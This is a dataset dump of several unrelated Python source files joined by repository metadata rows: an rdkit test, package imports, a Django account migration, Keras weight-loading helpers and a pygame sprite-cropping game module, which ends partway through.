] | 16 | 2020-12-28T21:45:09.000Z | 2022-03-19T12:03:58.000Z | tests/examples/test_stable_radical_molecule_state.py | harrysorensennrel/rlmolecule | 978269400b90f752bf4741f42f03522603b321e2 | [
"BSD-3-Clause"
] | 56 | 2020-12-30T16:12:33.000Z | 2022-02-02T18:32:44.000Z | tests/examples/test_stable_radical_molecule_state.py | harrysorensennrel/rlmolecule | 978269400b90f752bf4741f42f03522603b321e2 | [
"BSD-3-Clause"
] | 7 | 2021-01-05T01:34:04.000Z | 2021-09-29T13:42:44.000Z | import rdkit.Chem
def test_get_fingerprint():
from examples.stable_radical_optimization.stable_radical_molecule_state import FingerprintFilter
filter = FingerprintFilter()
mol = rdkit.Chem.MolFromSmiles('C/C(=C(C(/O)=C/[O])\C(C)(C)C)C(C)(C)C')
fps = set(filter.get_fingerprint(mol))
def test_filter():
from examples.stable_radical_optimization.stable_radical_molecule_state import FingerprintFilter
filter = FingerprintFilter()
mol = rdkit.Chem.MolFromSmiles('C/C(=C(C(/O)=C/[O])\C(C)(C)C)C(C)(C)C')
assert not filter.filter(mol)
mol = rdkit.Chem.MolFromSmiles('C/C(=C(C(/O)=C/[O])\C(C)(C)C)C(C)C')
assert filter.filter(mol)
| 35.263158 | 100 | 0.707463 | 107 | 670 | 4.299065 | 0.224299 | 0.126087 | 0.15 | 0.147826 | 0.758696 | 0.758696 | 0.758696 | 0.758696 | 0.732609 | 0.732609 | 0 | 0 | 0.122388 | 670 | 18 | 101 | 37.222222 | 0.782313 | 0 | 0 | 0.461538 | 0 | 0.230769 | 0.161194 | 0.161194 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.153846 | false | 0 | 0.230769 | 0 | 0.384615 | 0.461538 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
eb7c209ba382e1d8ffc0f19e5af96a7ffc4313e5 | 197 | py | Python | web_wrapper/__init__.py | xtream1101/web-wrapper | 8fe0a07ed6d885b1321cb89471addf84845d80cf | [
"MIT"
] | null | null | null | web_wrapper/__init__.py | xtream1101/web-wrapper | 8fe0a07ed6d885b1321cb89471addf84845d80cf | [
"MIT"
] | null | null | null | web_wrapper/__init__.py | xtream1101/web-wrapper | 8fe0a07ed6d885b1321cb89471addf84845d80cf | [
"MIT"
] | 1 | 2018-08-01T14:36:17.000Z | 2018-08-01T14:36:17.000Z | from web_wrapper.driver_requests import DriverRequests
from web_wrapper.driver_selenium_chrome import DriverSeleniumChrome
from web_wrapper.driver_selenium_phantomjs import DriverSeleniumPhantomJS
| 49.25 | 73 | 0.923858 | 23 | 197 | 7.565217 | 0.521739 | 0.12069 | 0.241379 | 0.344828 | 0.321839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060914 | 197 | 3 | 74 | 65.666667 | 0.940541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb9ff9199f2bc331dc541f4397d992fcfc098afb | 95 | py | Python | src/zope/deferredimport/samples/sample6.py | zopefoundation/zope.deferredimport | cee860773a434a5a94b8c466e3d4ef2764f30d25 | [
"ZPL-2.1"
] | 5 | 2015-07-10T07:12:05.000Z | 2019-08-05T08:38:05.000Z | src/zope/deferredimport/samples/sample6.py | zopefoundation/zope.deferredimport | cee860773a434a5a94b8c466e3d4ef2764f30d25 | [
"ZPL-2.1"
] | 9 | 2015-02-01T18:08:43.000Z | 2021-12-10T08:15:11.000Z | src/zope/deferredimport/samples/sample6.py | zopefoundation/zope.deferredimport | cee860773a434a5a94b8c466e3d4ef2764f30d25 | [
"ZPL-2.1"
] | 1 | 2015-04-03T08:37:15.000Z | 2015-04-03T08:37:15.000Z |
import zope.deferredimport.sample5
def getone():
return zope.deferredimport.sample5.one
| 13.571429 | 42 | 0.778947 | 11 | 95 | 6.727273 | 0.727273 | 0.486486 | 0.675676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02439 | 0.136842 | 95 | 6 | 43 | 15.833333 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.666667 | 0.333333 | 1.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 9 |
ebc62c85b61c1fe0af6fa8551ee9f72550580094 | 155 | py | Python | src/main.py | framlin/frinerva | 2aafc68c821438d1a6b753c7c3099a807af37842 | [
"MIT"
] | null | null | null | src/main.py | framlin/frinerva | 2aafc68c821438d1a6b753c7c3099a807af37842 | [
"MIT"
] | null | null | null | src/main.py | framlin/frinerva | 2aafc68c821438d1a6b753c7c3099a807af37842 | [
"MIT"
] | null | null | null | # from utils.utils import import_banking_csv_file
#
# import_banking_csv_file('../data/import/2019.csv')
from webserver import server
server.run_server()
| 22.142857 | 52 | 0.8 | 23 | 155 | 5.086957 | 0.478261 | 0.222222 | 0.273504 | 0.34188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028369 | 0.090323 | 155 | 6 | 53 | 25.833333 | 0.801418 | 0.632258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
693acbd98857ad0e250cf621c03537ffcd8b4a88 | 11,526 | py | Python | account/migrations/0001_initial.py | gibeongideon/daruapp | 20c454023674aeb66bf6c2880e81a8a00a4c92bc | [
"Unlicense",
"MIT"
] | 3 | 2021-05-26T12:38:22.000Z | 2021-06-26T12:49:29.000Z | account/migrations/0001_initial.py | gibeongideon/daruapp | 20c454023674aeb66bf6c2880e81a8a00a4c92bc | [
"Unlicense",
"MIT"
] | null | null | null | account/migrations/0001_initial.py | gibeongideon/daruapp | 20c454023674aeb66bf6c2880e81a8a00a4c92bc | [
"Unlicense",
"MIT"
] | 1 | 2021-05-04T05:45:26.000Z | 2021-05-04T05:45:26.000Z | # Generated by Django 3.1.7 on 2021-07-07 09:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AccountSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('curr_unit', models.FloatField(blank=True, default=0, null=True)),
('min_redeem_refer_credit', models.FloatField(blank=True, default=1000, null=True)),
('auto_approve', models.BooleanField(blank=True, default=False, null=True)),
('withraw_factor', models.FloatField(blank=True, default=1, null=True)),
],
options={
'db_table': 'd_accounts_setup',
},
),
migrations.CreateModel(
name='C2BTransaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('phone_number', models.BigIntegerField(blank=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('success', models.BooleanField(blank=True, default=False, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(blank=True, max_length=30, null=True)),
('rate', models.DecimalField(blank=True, decimal_places=5, max_digits=6, null=True)),
],
options={
'db_table': 'd_currency',
},
),
migrations.CreateModel(
name='RegisterUrl',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('success', models.BooleanField(blank=True, default=False, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='RefCreditTransfer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, default=0, max_digits=12, verbose_name='amount')),
('succided', models.BooleanField(blank=True, default=False, null=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_refer_credit_trans', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_refcredit_trans',
'ordering': ('-created_at',),
},
),
migrations.CreateModel(
name='RefCredit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, default=0, max_digits=6)),
('current_bal', models.DecimalField(blank=True, decimal_places=2, max_digits=12, null=True)),
('credit_from', models.CharField(blank=True, max_length=200, null=True)),
('closed', models.BooleanField(blank=True, null=True)),
('has_record', models.BooleanField(blank=True, null=True)),
('approved', models.BooleanField(blank=True, default=False, null=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='ref_accountcredit_users', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_refcredits',
},
),
migrations.CreateModel(
name='Checkout',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('paid', models.BooleanField(blank=True, default=False, null=True)),
('success', models.BooleanField(blank=True, default=False, null=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='checkouts', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CashWithrawal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=12)),
('address', models.CharField(blank=True, max_length=100, null=True)),
('approved', models.BooleanField(blank=True, default=False, null=True)),
('cancelled', models.BooleanField(blank=True, default=False, null=True)),
('withrawned', models.BooleanField(blank=True, null=True)),
('has_record', models.BooleanField(blank=True, null=True)),
('active', models.BooleanField(blank=True, default=True, null=True)),
('currency_id', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='account.currency')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_withrawals', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_withrawals',
},
),
migrations.CreateModel(
name='CashTransfer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('approved', models.BooleanField(blank=True, default=False, null=True)),
('success', models.BooleanField(blank=True, null=True)),
('recipient', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='recipientss', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='senderss', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CashDeposit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=12)),
('confirmed', models.BooleanField(blank=True, default=False, null=True)),
('deposited', models.BooleanField(blank=True, null=True)),
('deposit_type', models.CharField(blank=True, default='Shop Deposit', max_length=100, null=True)),
('has_record', models.BooleanField(blank=True, null=True)),
('currency_id', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='account.currency')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_deposits', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_deposits',
},
),
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('token_count', models.IntegerField(blank=True, default=0, null=True)),
('balance', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('actual_balance', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('withraw_power', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('refer_balance', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('trial_balance', models.DecimalField(blank=True, decimal_places=2, default=50000, max_digits=12, null=True)),
('cum_deposit', models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=12, null=True)),
('cum_withraw', models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=12, null=True)),
('active', models.BooleanField(blank=True, default=True, null=True)),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_accounts',
'ordering': ('-user_id',),
},
),
]
| 58.507614 | 181 | 0.595957 | 1,221 | 11,526 | 5.452907 | 0.121212 | 0.085311 | 0.075698 | 0.082607 | 0.824872 | 0.803545 | 0.756383 | 0.750225 | 0.728747 | 0.690748 | 0 | 0.011504 | 0.260888 | 11,526 | 196 | 182 | 58.806122 | 0.770043 | 0.003904 | 0 | 0.582011 | 1 | 0 | 0.107326 | 0.006011 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015873 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
694fc946a75c2cd08fb1c39bc482a958550cdb58 | 133 | py | Python | spug_api/apps/account/__init__.py | lucasaytt/arena_platform | 16a8c682e71d90b62c746da126cafc8e6444fe5f | [
"MIT"
] | null | null | null | spug_api/apps/account/__init__.py | lucasaytt/arena_platform | 16a8c682e71d90b62c746da126cafc8e6444fe5f | [
"MIT"
] | null | null | null | spug_api/apps/account/__init__.py | lucasaytt/arena_platform | 16a8c682e71d90b62c746da126cafc8e6444fe5f | [
"MIT"
] | null | null | null | from apps.account import user
def register_blueprint(app):
app.register_blueprint(user.blueprint, url_prefix='/account/users')
| 22.166667 | 71 | 0.789474 | 18 | 133 | 5.666667 | 0.666667 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 133 | 5 | 72 | 26.6 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
6964bd1411237b1be83914cc943b0f420876c950 | 12,724 | py | Python | utils/misc.py | JingweiJ/JointActorActionSeg | d33904f3f2c02094bb0a32bfec3105affff59426 | [
"MIT"
] | 11 | 2018-12-12T00:44:09.000Z | 2022-01-24T13:25:37.000Z | utils/misc.py | JingweiJ/JointActorActionSeg | d33904f3f2c02094bb0a32bfec3105affff59426 | [
"MIT"
] | 1 | 2019-04-24T08:25:12.000Z | 2019-04-24T08:25:12.000Z | utils/misc.py | JingweiJ/JointActorActionSeg | d33904f3f2c02094bb0a32bfec3105affff59426 | [
"MIT"
] | 3 | 2018-12-21T08:13:20.000Z | 2020-07-08T22:54:09.000Z | import numpy as np
import keras.backend as K
from keras.engine.topology import preprocess_weights_for_loading
import warnings
def RGB2Hex(R, G, B):
assert R in range(256) and G in range(256) and B in range(256)
return '0x' + '%06x' % (R * 256**2 + G * 256 + B)
def mask2bbox(mask, mode='xywh'):
'''
@input
mask: np array of (h, w). Entries are 0 (background) or 1 (foreground).
@return
a tuple of (x, y, w, h), where (x, y) is the coordinates of the upperleft corner of bbox,
w, h is the width and height of bbox.
'''
h, w = mask.shape
fg_loc = np.where(mask)
if mode == 'xywh':
y = np.min(fg_loc[0])
h = np.max(fg_loc[0]) - y
x = np.min(fg_loc[1])
w = np.max(fg_loc[1]) - x
return (x, y, w, h)
else:
raise NotImplementedError()
def load_weights_from_hdf5_group_by_weights_name(f, weights, weight_name_map={}, verbose=False):
''' f: a hdf5 group of weights.
weights: weights in the current graph to be assigned.
weight_name_map: {key: value} == {weight name in current graph: corresponding weight name in f
verbose: if True, print weight value tuples before assigning.
'''
weight_value_tuples = []
for w in weights:
try:
if w.name in weight_name_map:
match_weight_name = weight_name_map[w.name]
else:
match_weight_name = w.name
weight_value_tuples.append(
(w, f[match_weight_name])
)
except:
print('Error!')
print(w, w.name, match_weight_name)
if verbose:
print('Weight value tuples:')
from pprint import pprint
pprint(weight_value_tuples)
K.batch_set_value(weight_value_tuples)
def load_weights_from_hdf5_group_by_name(f, layers, layer_name_map={}, skip_mismatch=False, verbose=False, verboseverbose=False):
"""
Adapted from the function with same name in keras.engine.topology.
Added warnings when a layer in the hdf5 file fails to match any layers
in argument `layers`. Also print all assigned weights' names.
Implements name-based weight loading.
(instead of topological weight loading).
Layers that have no matching name are skipped.
# Arguments
f: A pointer to a HDF5 group.
layers: A list of target layers.
skip_mismatch: Boolean, whether to skip loading of layers
where there is a mismatch in the number of weights,
or a mismatch in the shape of the weights.
# Raises
ValueError: in case of mismatch between provided layers
and weights file and skip_mismatch=False.
"""
if 'keras_version' in f.attrs:
original_keras_version = f.attrs['keras_version'].decode('utf8')
else:
original_keras_version = '1'
if 'backend' in f.attrs:
original_backend = f.attrs['backend'].decode('utf8')
else:
original_backend = None
# New file format.
layer_names = [n.decode('utf8') for n in f.attrs['layer_names']]
# Reverse index of layer name to list of layers with name.
index = {}
for layer in layers:
if layer.name:
if layer.name in layer_name_map:
index.setdefault(layer_name_map[layer.name], []).append(layer)
else:
index.setdefault(layer.name, []).append(layer)
# We batch weight value assignments in a single backend call
# which provides a speedup in TensorFlow.
weight_value_tuples = []
for k, name in enumerate(layer_names):
g = f[name]
weight_names = [n.decode('utf8') for n in g.attrs['weight_names']]
weight_values = [g[weight_name] for weight_name in weight_names]
for layer in index.get(name, []):
symbolic_weights = layer.weights
# Skip preprocessing
#weight_values = preprocess_weights_for_loading(
# layer,
# weight_values,
# original_keras_version,
# original_backend)
if len(weight_values) != len(symbolic_weights):
if skip_mismatch:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in number of weights' +
' ({} vs {}).'.format(len(symbolic_weights), len(weight_values)))
continue
else:
raise ValueError('Layer #' + str(k) +
' (named "' + layer.name +
'") expects ' +
str(len(symbolic_weights)) +
' weight(s), but the saved weights' +
' have ' + str(len(weight_values)) +
' element(s).')
# Set values.
for i in range(len(weight_values)):
if skip_mismatch:
# weights' order in `symbolic_weights` may not align with the order in `weight_values` and `weight_names`.
try:
if K.int_shape(symbolic_weights[i]) != weight_values[weight_names.index(symbolic_weights[i].name)].shape:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in shape' +
' ({} vs {}).'.format(
symbolic_weights[i].shape,
weight_values[weight_names.index(symbolic_weights[i].name)].shape))
continue
except:
from pdb import set_trace; set_trace()
weight_value_tuples.append((symbolic_weights[i],
weight_values[weight_names.index(symbolic_weights[i].name)]))
if len(weight_value_tuples) == 0:
warnings.warn('No layer is loaded.')
#return
weights_in_layers = []
for layer in layers:
if layer.weights:
weights_in_layers += layer.weights
weights_to_be_assigned = [x for x, _ in weight_value_tuples]
for wil in weights_in_layers:
if wil not in weights_to_be_assigned:
if verbose:
warnings.warn('%s is not loaded.' % wil.name)
if verboseverbose:
print('Weight value tuples:')
from pprint import pprint
pprint(weight_value_tuples)
K.batch_set_value(weight_value_tuples)
def load_weights_from_hdf5_group_by_name_assume_weight_order(f, layers, layer_name_map={}, skip_mismatch=False, verbose=False):
"""
Adapted from the function with same name in keras.engine.topology.
Added warnings when a layer in the hdf5 file fails to match any layers
in argument `layers`. Also print all assigned weights' names.
Implements name-based weight loading.
(instead of topological weight loading).
Layers that have no matching name are skipped.
# Arguments
f: A pointer to a HDF5 group.
layers: A list of target layers.
skip_mismatch: Boolean, whether to skip loading of layers
where there is a mismatch in the number of weights,
or a mismatch in the shape of the weights.
# Raises
ValueError: in case of mismatch between provided layers
and weights file and skip_mismatch=False.
"""
if 'keras_version' in f.attrs:
original_keras_version = f.attrs['keras_version'].decode('utf8')
else:
original_keras_version = '1'
if 'backend' in f.attrs:
original_backend = f.attrs['backend'].decode('utf8')
else:
original_backend = None
# New file format.
layer_names = [n.decode('utf8') for n in f.attrs['layer_names']]
# Reverse index of layer name to list of layers with name.
index = {}
for layer in layers:
if layer.name:
if layer.name in layer_name_map:
index.setdefault(layer_name_map[layer.name], []).append(layer)
else:
index.setdefault(layer.name, []).append(layer)
# We batch weight value assignments in a single backend call
# which provides a speedup in TensorFlow.
weight_value_tuples = []
for k, name in enumerate(layer_names):
g = f[name]
weight_names = [n.decode('utf8') for n in g.attrs['weight_names']]
weight_values = [g[weight_name] for weight_name in weight_names]
for layer in index.get(name, []):
symbolic_weights = layer.weights
weight_values = preprocess_weights_for_loading(
layer,
weight_values,
original_keras_version,
original_backend)
if len(weight_values) != len(symbolic_weights):
if skip_mismatch:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in number of weights' +
' ({} vs {}).'.format(len(symbolic_weights), len(weight_values)))
continue
else:
raise ValueError('Layer #' + str(k) +
' (named "' + layer.name +
'") expects ' +
str(len(symbolic_weights)) +
' weight(s), but the saved weights' +
' have ' + str(len(weight_values)) +
' element(s).')
# Set values.
for i in range(len(weight_values)):
if skip_mismatch:
if K.int_shape(symbolic_weights[i]) != weight_values[i].shape:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in shape' +
' ({} vs {}).'.format(
symbolic_weights[i].shape,
weight_values[i].shape))
continue
weight_value_tuples.append((symbolic_weights[i],
weight_values[i]))
if len(weight_value_tuples) == 0:
warnings.warn('No layer is loaded.')
#return
weights_in_layers = []
for layer in layers:
if layer.weights:
weights_in_layers += layer.weights
weights_to_be_assigned = [x for x, _ in weight_value_tuples]
for wil in weights_in_layers:
if wil not in weights_to_be_assigned:
if verbose:
warnings.warn('%s is not loaded.' % wil.name)
if verbose:
print('Weight value tuples:')
from pprint import pprint
pprint(weight_value_tuples)
K.batch_set_value(weight_value_tuples)
def get_cross_label(actor_label, action_label, num_actor_class, num_action_class):
''' Given actor label and action label, compute the cross-product label.
Inverse function of `decouple_cross_label`.
actor_label: size of (batch_size, ), values are {1, ..., num_actor_class}.
action_label: size of (batch_size, ), values are {1, ..., num_action_class}.
num_actor_class: not including 'BG'. e.g. in A2D, num_actor_class = 7
num_action_class: not including 'BG'. e.g. in A2D, num_action_class = 9
return:
cross_label: size of (batch_size,), int, values are {1, ..., num_actor_class
* num_action_class}.
'''
cross_label = (actor_label - 1) * num_action_class + action_label
return cross_label
def decouple_cross_label(cross_label, num_actor_class, num_action_class):
''' Given the cross-product label, compute the actor label and action label.
Inverse function of `get_cross_label`.
cross_label: size of (batch_size,), int, values are {1, ..., num_actor_class
* num_action_class}.
num_actor_class: not including 'BG'. e.g. in A2D, num_actor_class = 7
num_action_class: not including 'BG'. e.g. in A2D, num_action_class = 9
return:
actor_label: size of (batch_size, ), values are {1, ..., num_actor_class}.
action_label: size of (batch_size, ), values are {1, ..., num_action_class}.
'''
actor_label = (cross_label - 1) // num_action_class + 1
action_label = cross_label - (actor_label - 1) * num_action_class
return actor_label, action_label
| 41.718033 | 129 | 0.576941 | 1,564 | 12,724 | 4.5 | 0.131074 | 0.034385 | 0.048309 | 0.01364 | 0.806763 | 0.797101 | 0.796817 | 0.792697 | 0.772236 | 0.754618 | 0 | 0.007662 | 0.333307 | 12,724 | 304 | 130 | 41.855263 | 0.821997 | 0.279158 | 0 | 0.730769 | 0 | 0 | 0.090314 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 1 | 0.038462 | false | 0 | 0.043956 | 0 | 0.104396 | 0.06044 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c6056747de305c8bb0bfb215b324e56ae908d9f7 | 31,907 | py | Python | clases2.py | alejoso76/Wolverine-beat-em-up-FINAL | ffc644083a5e74e6c785e3668721ec60e112bdc9 | [
"MIT"
] | 1 | 2021-05-22T20:06:51.000Z | 2021-05-22T20:06:51.000Z | clases2.py | alejoso76/Wolverine-beat-em-up-FINAL | ffc644083a5e74e6c785e3668721ec60e112bdc9 | [
"MIT"
] | null | null | null | clases2.py | alejoso76/Wolverine-beat-em-up-FINAL | ffc644083a5e74e6c785e3668721ec60e112bdc9 | [
"MIT"
] | null | null | null | import pygame
import random
import math
bite=pygame.mixer.Sound('bite.ogg')
cry=pygame.mixer.Sound('cry.ogg')
channel6 = pygame.mixer.Channel(5)
def recortarReptV2(archivo):
fondo=pygame.image.load(archivo)
infoFondo=fondo.get_rect()
matriz=[]
idleR=[]
idleL=[]
walkR=[]
walkL=[]
attack1R=[]
attack1L=[]
dieR=[]
dieL=[]
idle=[[5, 51, 228, 174], [280, 51, 228, 174], [552, 51, 228, 174], [825, 51, 228, 174], [1091, 51, 228, 174]]
walkRight=[[0, 321, 228, 174] , [294, 321, 228, 174] , [554, 321, 228, 174] , [816, 321, 228, 174] , [1092, 321, 228, 174] ,[1362, 321, 228, 174] ]
attack1=[[0,605,228,180], [282,554,228,227], [535,554,228,227], [820,554,228,227], [1108,605,192,180]]
die=[[262, 111, 55, 57], [328, 111, 67, 57], [404, 11 ,74, 57]]
#Idle R-L
for x in range(5):
cuadro=fondo.subsurface(idle[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
idleR.append(cuadro)
idleL.append(cuadro2)
#Walk R-L
for x in range(6):
cuadro=fondo.subsurface(walkRight[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
walkR.append(cuadro)
walkL.append(cuadro2)
#Attack 1 R-L
for x in range(5):
cuadro=fondo.subsurface(attack1[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
attack1R.append(cuadro)
attack1L.append(cuadro2)
#Die 1 R-L
for x in range(3):
cuadro=fondo.subsurface(die[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
dieR.append(cuadro)
dieL.append(cuadro2)
return idleR, idleL, walkR, walkL, attack1R, attack1L, dieR, dieL
def recortarRept(max_x, max_y, archivo, vector):
imagen=pygame.image.load(archivo)
info=imagen.get_rect()
an_imagen=info[2]
al_imagen=info[3]
an_image_corte= an_imagen/max_x
al_image_corte= al_imagen/max_y
mapa=[]
for i in range(max_y):
mapis=[]
for j in range(vector[i]):
cuadro=imagen.subsurface(j*an_image_corte, i*al_image_corte, an_image_corte, al_image_corte)
mapis.append(cuadro)
mapa.append(mapis)
return mapa
